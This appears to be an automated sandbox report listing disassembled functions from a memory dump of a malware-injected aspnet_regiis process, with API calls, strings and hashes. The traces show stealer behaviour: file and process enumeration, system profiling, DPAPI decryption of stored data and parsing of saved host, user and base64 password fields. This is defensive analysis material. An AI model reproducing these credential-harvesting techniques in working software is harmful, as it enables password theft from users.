Download Yara Rule

APIs

wsprintfA.USER32 ref: 02761B9D
FindFirstFileA.KERNEL32(?,?), ref: 02761BB4
StrCmpCA.SHLWAPI(?,0276D834), ref: 02761BE2
StrCmpCA.SHLWAPI(?,0276D838), ref: 02761BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 02761D3D
FindClose.KERNEL32(000000FF), ref: 02761D52

Strings

%s\%s, xrefs: 02761B91

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: a212a905d69d8a8137a9e726f54192f70b2be1756c7923286ff47925fc44197f
Instruction ID: 33b2020f740752b0090a5635aeaa9ddc07ebf3867522ab9667eeb820e6a49c94
Opcode Fuzzy Hash: a212a905d69d8a8137a9e726f54192f70b2be1756c7923286ff47925fc44197f
Instruction Fuzzy Hash: 025135B5944118ABCB25EBB0DC9DFFA737DBB44700F844988BA0D96140EB759788CF90

Function 027515C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,027715BC,?,02751E03,?,027715C0,?,?,00000000,?,00000000), ref: 02751813
StrCmpCA.SHLWAPI(?,027715C4), ref: 02751863
StrCmpCA.SHLWAPI(?,027715C8), ref: 02751879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02751C30
DeleteFileA.KERNEL32(00000000), ref: 02751CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 02751D0A
FindClose.KERNEL32(000000FF), ref: 02751D1C

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Strings

\*.*, xrefs: 027516E1

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 813663410cf032b86e68157fc58828ea506ac5154e912aee6d166ce09d443a30
Instruction ID: 883fb409e2abfd02122cc774239dbc5979de4a271081c80895fb6686261f383d
Opcode Fuzzy Hash: 813663410cf032b86e68157fc58828ea506ac5154e912aee6d166ce09d443a30
Instruction Fuzzy Hash: E31201719101189BCF1AEB61CC6CAFEB37EAF54344FC445A9990A63054EF746B89CFA0

Function 0275D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0276DC10,0276D73F), ref: 0275D22B
StrCmpCA.SHLWAPI(?,0276DC14), ref: 0275D273
StrCmpCA.SHLWAPI(?,0276DC18), ref: 0275D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0275D4EE
FindClose.KERNEL32(000000FF), ref: 0275D500

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 647a98de9179a7caf4437c9e6593dd4d2c15596de827ec145708f57d3e48f468
Instruction ID: 25ca1fab21959cd2c51942b20bfa3234fc3948380de01c946ddbdb82c29c7ce8
Opcode Fuzzy Hash: 647a98de9179a7caf4437c9e6593dd4d2c15596de827ec145708f57d3e48f468
Instruction Fuzzy Hash: E791FC729001189BCF15FBB1EC5D9FEB37EAB84740F804668AD0A97144EB74AB588FD1

Function 02764560 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

GetKeyboardLayoutList.USER32(00000000,00000000,0276D146), ref: 0276458E
LocalAlloc.KERNEL32(00000040,?), ref: 027645A6
GetKeyboardLayoutList.USER32(?,00000000), ref: 027645BA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0276460F
LocalFree.KERNEL32(00000000), ref: 027646CF

Strings

/ , xrefs: 0276462C

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 65026e1e6298a66275067f05feccedf67585f87047bf25377f074e99f7c7c1e1
Instruction ID: 739021fcb60c167ee671bd66eebed135e73e457fedd668be254d5fe733c71c43
Opcode Fuzzy Hash: 65026e1e6298a66275067f05feccedf67585f87047bf25377f074e99f7c7c1e1
Instruction Fuzzy Hash: EB410875940228ABDB24EB54DC9CBFDB379BF54304F9081D9A90A66181DB746F84CF90

Function 0275DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0276D74E), ref: 0275DBD2
StrCmpCA.SHLWAPI(?,0276DC58), ref: 0275DC22
StrCmpCA.SHLWAPI(?,0276DC5C), ref: 0275DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0275E306

Strings

\*.*, xrefs: 0275DB7D

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: de2883db9b3c113504026db9b41620a1ba4f0ebe7127e990885490f6627a1137
Instruction ID: 6ddf9a0693c9fc2101bc0089d5972e48b34eb2b22e28e2413fdd8e77f49e1737
Opcode Fuzzy Hash: de2883db9b3c113504026db9b41620a1ba4f0ebe7127e990885490f6627a1137
Instruction Fuzzy Hash: 66121E719101189BDF1AFB61DCADAFDB33EAF54340F8045A9A90A63054EF746B48CFA1

Function 02765CF0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02765D0E
Process32First.KERNEL32(0276D599,00000128), ref: 02765D22
Process32Next.KERNEL32(0276D599,00000128), ref: 02765D37
StrCmpCA.SHLWAPI(?,00000000), ref: 02765D4C
CloseHandle.KERNEL32(0276D599), ref: 02765D6A

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: aeb3f360eb0d2820c80b0b82167683b65e8e18fbe3d419b98e731ac4c0b2cbfb
Instruction ID: f08ccd285d07299b674c32d7b1d0988d3fea2fb96fc4937d9a85293159aec804
Opcode Fuzzy Hash: aeb3f360eb0d2820c80b0b82167683b65e8e18fbe3d419b98e731ac4c0b2cbfb
Instruction Fuzzy Hash: 9F011E75A44208EBDB20DFA5D89CBFDB7B8FB48700F444699E905A7280D7709B54DF50

Function 027644A0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02BB5F68,00000000,?,0276D758,00000000,?,00000000,00000000,?,02BB5450,00000000), ref: 027644B0
RtlAllocateHeap.NTDLL(00000000), ref: 027644B7
GetTimeZoneInformation.KERNEL32(?), ref: 027644CA
wsprintfA.USER32 ref: 02764504

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: d7c4ef427e4f83926da9c73717a3ab1519022125e6550c355f84dd93ade5a8c3
Instruction ID: 25c8ca5ac7830343d2c8b033a7cfb09d0d78a8b447666321d6c80d12e8b537f1
Opcode Fuzzy Hash: d7c4ef427e4f83926da9c73717a3ab1519022125e6550c355f84dd93ade5a8c3
Instruction Fuzzy Hash: 98F01D70E483289BDB609B64DD59BB9777AAB04311F4005D4EA0EA3281DB705E98CF92

Function 02759540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02759564
LocalAlloc.KERNEL32(00000040,00000000), ref: 02759583
LocalFree.KERNEL32(?), ref: 027595AF

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: f5d4dfbe91bbde59a71c8cf2f4994ca74e315bb663599832708e1d8f53104f2a
Instruction ID: 8d875e14761b71cc9f9b324f5ff0e0a0e57334b155cd15d1d39a6fb7a5574799
Opcode Fuzzy Hash: f5d4dfbe91bbde59a71c8cf2f4994ca74e315bb663599832708e1d8f53104f2a
Instruction Fuzzy Hash: A911B7B8A00209EFCB04DFA4C984AAEB7B9FF89301F104558ED15A7390D770AA54CFA1

Function 027643B0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,02751177,02BA0588,027636DB,0276D6E3), ref: 027643BD
RtlAllocateHeap.NTDLL(00000000), ref: 027643C4
GetUserNameA.ADVAPI32(?,00000104), ref: 027643DC

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 2057e899896daed256b54a55efd178402e5126d7555214b3da73eb1a8f29d425
Instruction ID: e198296f7d07ee27f9e80ee70faa4d38e92201e37e7ff91c8c3bf492106ebaed
Opcode Fuzzy Hash: 2057e899896daed256b54a55efd178402e5126d7555214b3da73eb1a8f29d425
Instruction Fuzzy Hash: 80E0BFB5D4430CABDB40DBE4D849B9D7BB8AB08311F400595EA49D2280D67456588B91

Function 027647B0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 027647BD
wsprintfA.USER32 ref: 027647D3

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 10fefd04b36acbb7ecdc7feacc1a69d8437ec7cbb2f78573cc5c7cadc38b5270
Instruction ID: 5fac82e667c74a64a35fd37d99e9e541e6b9c30ac01c5114730b58fcbf591f02
Opcode Fuzzy Hash: 10fefd04b36acbb7ecdc7feacc1a69d8437ec7cbb2f78573cc5c7cadc38b5270
Instruction Fuzzy Hash: F0D0C2B5C4020C5BC710DB90EC49DF9B77CAB04204F004DA4EE0492100E7B4AEA88BA4

Function 027570E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,02763068,?), ref: 027570F4
RtlAllocateHeap.NTDLL(00000000,?,02763068), ref: 027570FB
lstrcat.KERNEL32(?,02BB1BA0), ref: 027572AB
lstrcat.KERNEL32(?,?), ref: 027572BF
lstrcat.KERNEL32(?,?), ref: 027572D3
lstrcat.KERNEL32(?,?), ref: 027572E7
lstrcat.KERNEL32(?,02BB6220), ref: 027572FB
lstrcat.KERNEL32(?,02BB6298), ref: 0275730F
lstrcat.KERNEL32(?,02BB6238), ref: 02757322
lstrcat.KERNEL32(?,02BB5FF8), ref: 02757336
lstrcat.KERNEL32(?,02BB63A0), ref: 0275734A
lstrcat.KERNEL32(?,?), ref: 0275735E
lstrcat.KERNEL32(?,?), ref: 02757372
lstrcat.KERNEL32(?,?), ref: 02757386
lstrcat.KERNEL32(?,02BB6220), ref: 02757399
lstrcat.KERNEL32(?,02BB6298), ref: 027573AD
lstrcat.KERNEL32(?,02BB6238), ref: 027573C1
lstrcat.KERNEL32(?,02BB5FF8), ref: 027573D4
lstrcat.KERNEL32(?,02BB6408), ref: 027573E8
lstrcat.KERNEL32(?,?), ref: 027573FC
lstrcat.KERNEL32(?,?), ref: 02757410
lstrcat.KERNEL32(?,?), ref: 02757424
lstrcat.KERNEL32(?,02BB6220), ref: 02757438
lstrcat.KERNEL32(?,02BB6298), ref: 0275744B
lstrcat.KERNEL32(?,02BB6238), ref: 0275745F
lstrcat.KERNEL32(?,02BB5FF8), ref: 02757473
lstrcat.KERNEL32(?,02BB6470), ref: 02757486
lstrcat.KERNEL32(?,?), ref: 0275749A
lstrcat.KERNEL32(?,?), ref: 027574AE
lstrcat.KERNEL32(?,?), ref: 027574C2
lstrcat.KERNEL32(?,02BB6220), ref: 027574D6
lstrcat.KERNEL32(?,02BB6298), ref: 027574EA
lstrcat.KERNEL32(?,02BB6238), ref: 027574FD
lstrcat.KERNEL32(?,02BB5FF8), ref: 02757511
lstrcat.KERNEL32(?,02BB64D8), ref: 02757525
lstrcat.KERNEL32(?,?), ref: 02757539
lstrcat.KERNEL32(?,?), ref: 0275754D
lstrcat.KERNEL32(?,?), ref: 02757561
lstrcat.KERNEL32(?,02BB6220), ref: 02757574
lstrcat.KERNEL32(?,02BB6298), ref: 02757588
lstrcat.KERNEL32(?,02BB6238), ref: 0275759C
lstrcat.KERNEL32(?,02BB5FF8), ref: 027575AF
lstrcat.KERNEL32(?,02BB6540), ref: 027575C3
lstrcat.KERNEL32(?,?), ref: 027575D7
lstrcat.KERNEL32(?,?), ref: 027575EB
lstrcat.KERNEL32(?,?), ref: 027575FF
lstrcat.KERNEL32(?,02BB6220), ref: 02757613
lstrcat.KERNEL32(?,02BB6298), ref: 02757626
lstrcat.KERNEL32(?,02BB6238), ref: 0275763A
lstrcat.KERNEL32(?,02BB5FF8), ref: 0275764E

Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020,0276DEB8), ref: 02756FD6
Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020,00000000), ref: 02757018
Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020, : ), ref: 0275702A
Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020,00000000), ref: 0275705F
Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020,0276DEC0), ref: 02757070
Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020,00000000), ref: 027570A3
Part of subcall function 02756FA0: lstrcat.KERNEL32(2F0D0020,0276DEC4), ref: 027570BD
Part of subcall function 02756FA0: task.LIBCPMTD ref: 027570CB

lstrcat.KERNEL32(?,02BB5968), ref: 027577DB
lstrcat.KERNEL32(?,02BB56F0), ref: 027577EE
lstrlen.KERNEL32(2F0D0020), ref: 027577FB
lstrlen.KERNEL32(2F0D0020), ref: 0275780B

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 02754DC0: lstrlen.KERNEL32(00000000), ref: 02754E4A
Part of subcall function 02754DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754EBB
Part of subcall function 02754DC0: StrCmpCA.SHLWAPI(?,02BB5868), ref: 02754ED9

Memory Dump Source

Source File: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true

Associated: 00000002.00000002.1805878780.000000000276B000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002773000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002798000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1805898041.0000000002974000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1806138142.0000000002986000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2750000_aspnet_regiis.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: e005028595383697d35a36caad912a8b39c726bda8bcc4b7be475bee1126ef79
Instruction ID: a2c2db73bb4af9e088ce0ac5b0df24eeabbad2c8cbfa1ccfcaa616e771e5ba15
Opcode Fuzzy Hash: e005028595383697d35a36caad912a8b39c726bda8bcc4b7be475bee1126ef79
Instruction Fuzzy Hash: B43216B6D45218ABCB55EBA0DC9CEEE737DAB44700F844A98B60976080DB74E758CF90

Function 0275EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02766D30: lstrcpy.KERNEL32(0276D6E3,00000000), ref: 02766D78

Part of subcall function 027654D0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 027654FB

Part of subcall function 02766F10: lstrcpy.KERNEL32(00000000,?), ref: 02766F62
Part of subcall function 02766F10: lstrcat.KERNEL32(00000000), ref: 02766F72

Part of subcall function 02766E90: lstrcpy.KERNEL32(?,0276D6E3), ref: 02766EF5

Part of subcall function 02766FA0: lstrlen.KERNEL32(?,0276D8B0,?,00000000,0276D6E3), ref: 02766FB5
Part of subcall function 02766FA0: lstrcpy.KERNEL32(00000000), ref: 02766FF4
Part of subcall function 02766FA0: lstrcat.KERNEL32(00000000,00000000), ref: 02767002

Part of subcall function 02766D90: lstrcpy.KERNEL32(?,00000000), ref: 02766DD6

Part of subcall function 027593A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027593CC
Part of subcall function 027593A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 027593F1
Part of subcall function 027593A0: LocalAlloc.KERNEL32(00000040,?), ref: 02759411
Part of subcall function 027593A0: ReadFile.KERNEL32(000000FF,?,00000000,0275EB27,00000000), ref: 0275943A
Part of subcall function 027593A0: LocalFree.KERNEL32(0275EB27), ref: 02759470
Part of subcall function 027593A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0275947A

Part of subcall function 02765520: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02765542

strtok_s.MSVCRT ref: 0275EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0276D77A,0276D777,0276D776,0276D773), ref: 0275EBA2
RtlAllocateHeap.NTDLL(00000000), ref: 0275EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0275EBC5
lstrlen.KERNEL32(00000000), ref: 0275EBD3

Part of subcall function 02764F90: malloc.MSVCRT ref: 02764F98
Part of subcall function 02764F90: strncpy.MSVCRT ref: 02764FB3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0275EC0F
lstrlen.KERNEL32(00000000), ref: 0275EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0275EC59
lstrlen.KERNEL32(00000000), ref: 0275EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0275ECA3
lstrlen.KERNEL32(00000000), ref: 0275ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0276D772), ref: 0275ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0275ED5A
